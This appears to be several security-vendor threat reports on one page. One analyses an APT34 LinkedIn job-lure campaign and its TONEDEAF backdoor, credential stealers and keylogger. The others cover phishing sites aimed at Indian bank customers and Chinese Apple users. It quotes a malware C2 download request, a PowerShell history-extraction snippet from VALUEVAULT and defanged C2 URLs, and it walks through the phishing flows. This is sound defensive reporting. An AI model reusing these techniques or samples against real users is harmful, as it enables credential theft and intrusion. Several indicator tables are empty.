      On June 19, 2019, Mandiant Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and was stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral monitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies that threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be sandboxed or terminated, preventing an exploit from reaching its next programmed step.

      The Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5: b338baa673ac007d7af54075ea69660b), located in C:\Users\<user_name>\.templates. The file System.doc is a Windows Portable Executable (PE), despite having a "doc" file extension. FireEye identified this new malware family as TONEDEAF.

      A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details of TONEDEAF in the malware appendix of this post.

      Retracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named ERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls originated from the URL[.]com/Documents/ERFT-Details.xls. Network evidence also showed the access of a LinkedIn message directly preceding the spreadsheet download.

      Managed Defense reached out to the impacted customer’s security team, who confirmed the file was received via a LinkedIn message. The targeted employee conversed with "Rebecca Watts", allegedly employed as "Research Staff at University of Cambridge". The conversation with Ms. Watts, provided in Figure 1, began with the solicitation of resumes for potential job opportunities.

      Figure 1: Screenshot of LinkedIn message asking to download TONEDEAF

      This is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various campaigns. These conversations often take place on social media platforms, which can be an effective delivery mechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.

      FireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file hashes:

      • 96feed478c347d4b95a8224de26a1b2c
      • caf418cbf6a9c4e93e79d4714d5d3b87

      A snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded text upon opening.

      Figure 2: Screenshot of VBA code from System.doc

      The spreadsheet also creates a scheduled task named "windows update check" that runs the file C:\Users\<user_name>\.templates\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will rename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled task, clearly obfuscated to avoid simple detection.

      Figure 3: Additional VBA code from System.doc

      Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.

      The FireEye Footprint: Pivots and Victim Identification

      After identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and Advanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations. Of note, FireEye discovered two additional new malware families hosted at this domain, VALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft tool FireEye has been tracking since May 2018, hosted on the C2.

      Requests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of installation and purpose. Additionally, during installation, the malware retrieves the system and current user names, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to track infected target activity. URLs were observed with the following structures:

      • hxxp[://]offlineearthquake[.]com/download?id=<sys_id>&n=000
      • hxxp[://]offlineearthquake[.]com/upload?id=<sys_id>&n=000
      • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&h=000
      • hxxp[://]offlineearthquake[.]com/file/<sys_id>/<executable>?id=<cmd_id>&n=000

      The first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5: 021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Window’s temp folder. Further information regarding LONGWATCH is detailed in the Malware Appendix section at the end of the post.

      FireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure (Figure 4).

      GET hxxp://<sys_id>/b.exe?id=<3char_redacted>&n=000
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)
      AppleWebKit/537.36 (KHTML, like Gecko)
      Host: offlineearthquake[.]com
      Proxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1

      Figure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance

      FireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.

      VALUEVAULT is a Golang compiled version of the "Windows Vault Password Dumper" browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

      VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. Further information regarding VALUEVAULT can be found in the appendix below.

      Further pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5: d8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files were analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.

      PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34.


      The activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true techniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense customers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon the observed indicators to identify a broader campaign, as well as the use of new and old malware.

      We suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping their TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we recommend organizations remain vigilant in their defenses, and remember to view their environment holistically when it comes to information security.

      Learn more about Mandiant Managed Defense, and catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.

      Malware Appendix


      TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality. Figure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a means for future DNS exfiltration as a plan B.

      Figure 5: Snippet of code from TONEDEAF binary

      Aside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and bugs that prevent it from executing properly. One such bug involves determining the length of a command response string without accounting for Unicode strings. As a result, a single command response byte is sent when, for example, the malware executes a shell command that returns Unicode output. Additionally, within the malware, an unused string contained the address 185[.]15[.]247[.]154.


      VALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel.

      VALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view the credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites. A snippet of this function is shown in Figure 6.

      powershell.exe /c "function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shell.Application. $hist = $shell.NameSpace(34). $folder = $hist.Self. . $hist.Items() | . foreach {. if ($_.IsFolder) {. $siteFolder = $_.GetFolder. $siteFolder.Items() | . foreach {. $site = $_. . if ($site.IsFolder) {. $pageFolder = $site.GetFolder. $pageFolder.Items() | . foreach {. $visit = New-Object -TypeName PSObject -Property @{ . URL = $($pageFolder.GetDetailsOf($_,0)) . }. $visit. }. }. }. }. }. }. get-iehistory

      Figure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials

      Upon execution, VALUEVAULT creates a SQLITE database file in the AppData\Roaming directory under the context of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the dumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault Password Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.

      Figure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database

      VALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other developer environment variables were directly available within the binary as shown below. VALUEVAULT does not possess the ability to perform network communication, meaning the operators would need to manually retrieve the captured output of the tool.

      C:/Users/<redacted>/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go

      Figure 8: Golang files extracted during execution of VALUEVAULT


      FireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the malicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary function of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.

      Interesting strings identified in the binary are shown in Figure 9.

      [PRINT SCREEN] (1 space)
      \n\n >>>  (2 spaces)

      Figure 9: Strings identified in a LONGWATCH binary

      Detecting the Techniques

      FireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT, and LONGWATCH. Table 2 contains several specific detection names that provide an indication of APT34 activity.

      Signature Name








      TONEDEAF BACKDOOR [upload]


      Table 1: FireEye Platform Detections

      Endpoint Indicators


      MD5 Hash (if applicable)

      Code Family

























      Table 2: APT34 Endpoint Indicators from this blog post

      Network Indicators






      A huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this APT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth malware analysis.

      ‘One-Stop Shop’ – Phishing Domain Targets Information from Customers of Several Indian Banks

      FireEye Labs recently discovered a malicious phishing domain designed to steal a variety of information – including credentials and mobile numbers – from customers of several banks in India. Currently, we have not observed this domain being used in any campaigns. The phishing websites appear to be in the earlier stages of development and through this post we hope users will be able to identify these types of emerging threats in the future.

      FireEye phishing detection technology identified a newly registered domain, “csecurepay[.]com”, that was registered on Oct. 23, 2016. The website purports to offer online payment gateway services, but is actually a phishing website that leads to the capturing of victim logon credentials – and other information – for multiple banks operating in India.

      Prior to publication, FireEye notified the Indian Computer Emergency Response Team.

      Phishing Template Presentation and Techniques

      Step 1

      URL: hxxp://csecurepay[.]com/load-cash-step2.aspx

      When navigating to the URL, the domain appears to be a payment gateway and requests that the user enter their bank account number and the amount to be transferred, as seen in Figure 1. The victim is allowed to choose their bank from a list that is provided.

      Figure 1: Bank information being requested

      By looking at the list, it is clear that only Indian banks are being targeted at this time. A total of 26 banks are available and these are named in the Appendix.

      Step 2

      URL:  hxxp://csecurepay[.]com/PaymentConfirmation.aspx

      The next website requests the victim to enter their valid 10-digit mobile number and email ID (Figure 2), which makes the website appear more legitimate.

      Figure 2: Personal information being requested

      Step 3

      The victim will then be redirected to the spoofed online banking page of the bank they selected, which requests that they log in using their user name and password. Figure 3 shows a fake login page for State Bank of India. See the Appendix for more banks that have spoofed login pages.

      Figure 3: Fake login page for State Bank of India

      After entering their login credentials, the victim will be asked to key in their One Time Password (OTP), as seen in Figure 4.

      Figure 4: OTP being requested

      Step 4

      URL: hxxp://csecurepay[.]com/Final.aspx

      Once all of the sensitive data is gathered, a fake failed login message will be displayed to the victim, as seen in Figure 5.

      Figure 5: Fake error message being displayed

      Credit and Debit Card Phishing Website

      Using the registrant information from the csecurepay domain, we found another domain registered by the phisher as “nsecurepay[.]com”. The domain, registered in latest August 2016, aims to steal credit and debit card information.

      The following are among the list of cards that are targeted:

      1.     ICICI Credit Card

      2.     ICICI Debit Card

      3.     Visa/Master Credit Card

      4.     Visa/Master Debit Card

      5.     SBI Debit Card Only

      At the time of this writing, the nsecurepay website was producing errors when redirecting to spoofed credit and debit card pages. Figure 6 shows the front end.

      Figure 6: Nsecurepay front end


      Phishing has its own development lifecycle. It usually starts off with building the tools and developing the “hooks” for luring victims into providing their financial information. Once the phishing website (or websites) is fully operational, we typically begin to see a wave of phishing emails pointing to it.

      In this case, we see that phishing websites have been crafted to spoof multiple banks in India. These attackers can potentially grab sensitive online banking information and other personal data, and even provided support for multifactor authentication and OTP. Moreover, disguising the initial presentation to appear as an online payment gateway service makes the phishing attack seem more legitimate.

      FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns.


      Fake login pages were served for 26 banks. The following is a list of some of the banks:

      -Bank of Baroda - Corporate

      -Bank of Baroda - Retail

      -Bank of Maharashtra

      -HDFC Bank

      Figure 7: HDFC Bank fake login page

      -ICICI Bank

      -IDBI Bank

      -Indian Bank

      -IndusInd Bank

      -Jammu and Kashmir Bank

      -Kotak Bank

      -Lakshmi Vilas Bank - Corporate

      -Lakshmi Vilas Bank - Retail

      -State Bank of Hyderabad

      -State Bank of India

      -State Bank of Jaipur

      -State Bank of Mysore

      -State Bank of Patiala

      -State Bank of Bikaner

      -State Bank of Travancore

      -Tamilnad Mercantile Bank

      -United Bank of India

      Rotten Apples: Resurgence

      In June 2016, we published a blog about a phishing campaign targeting the Apple IDs and passwords of Chinese Apple users that emerged in the first quarter of 2016 (referred to as the “Zycode” phishing campaign). At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains and this system had observed some phishing domains that were designed to appear as legitimate Apple domains. Most of the domains reported by this system were suspended in June 2016, which resulted in a loss of momentum for the Zycode phishing campaign. Throughout the second quarter of 2016, the Zycode phishing campaign was in hibernation.

      We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016. Once again, Chinese Apple users are being targeted for their Apple IDs and passwords using the same content reported on in our earlier blog. The majority of these domains are registered in the .com TLD by email accounts from qq[.]com, and the IPs of these domains point to mainland China, as seen in Figure 1.

      Figure 1: Google map showing the location of the hosted phishing domains

      What has not Changed?

      The attackers have not changed the content of the phishing sites. The obfuscated JavaScript used in the earlier version is once again being used here in this campaign. We have provided the details of JavaScript and screenshots of interaction with the website in our earlier blog.

      What has Changed?

      Apparently the domains and email addresses used in previous version of the campaign were effectively taken down. Now the attackers have moved to a new malicious infrastructure; new domains, IPs and email addresses are being used for this campaign. The new domain names for the campaign are listed in Table 1, while their IPs and registrant emails are reported in Table 2 and Table 3, respectively.

      Domains List

      Table 1: Apple phishing domains serving the Zycode phishing kit.

      Unique IP(s)

      Table 2 shows the list of unique IPs, which are not the same as what was seen before.

      Table 2. IP addresses used by the domains.

      Unique Email Addresses

      The email addresses used to register these domains, showing no similarity with email addresses in the previous campaign, are shown in Table 3.

      Table 3. List of unique registrant emails.

      Unique Registrants

      Table 4 shows the registrant names, which have no similarity with the previous registrant name information.

      Table 4. List of registrant names used by the phishing domains.

      How to Avoid Being a Victim

      Apple provides information on phishing here and here, and on iCloud security here. There are simple ways for a user to be more secure against this and similar attacks. The following are a few tips:

      • Enable two-factor authentication for Apple ID.
      • Always check the address bar for the correct web address.
      • Avoid clicking links in emails and SMS messages that supposedly direct to iCloud pages.
      • Use our FireEye EX appliance, which provides effective detection for the Zycode phishing campaign.